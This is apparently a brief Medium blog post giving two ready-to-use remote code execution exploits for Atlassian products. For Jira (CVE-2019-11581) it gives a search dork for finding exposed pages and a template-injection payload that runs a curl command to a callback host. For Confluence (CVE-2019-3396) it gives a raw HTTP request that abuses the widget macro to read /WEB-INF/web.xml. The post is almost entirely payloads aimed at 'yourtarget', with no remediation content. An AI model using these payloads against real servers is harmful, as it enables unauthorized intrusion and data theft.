Two Easy RCE in Atlassian Products

Valeriy Shevchenko
Aug 9 · 4 min read

1. Jira Remote Code Execution in Contact Administrators form (CVE-2019–11581)

inurl:secure/ContactAdministrators!default.jspa
https://jira.example.com/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’,null).invoke(null,null).exec(‘curl http://your-testing-server.com/rcetest?a=a').waitFor()

2. Confluence Remote Code Execution via Widget Connector macro (CVE-2019–3396)

POST /rest/tinymce/1/macro/preview HTTP/1.1Referer: https://confluence.yourtarget.com/Content-Type: application/json; charset=utf-8Cookie: BIGipServerrb-p_cp-confluence_https_pool=!BUsntvn1os/4xuQWbHAsuN+1fsz22TIKPNFouw==;JSESSIONID=E3A43CEFE1932634CD80E301057C379DAccept: */*Accept-Encoding: gzip,deflateContent-Length: 173Host: confluence.yourtarget.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36Connection: Keep-alive
{"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1","width":"200","height":"200","_template":"/WEB-INF/web.xml"}}}

Valeriy Shevchenko

Written by

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade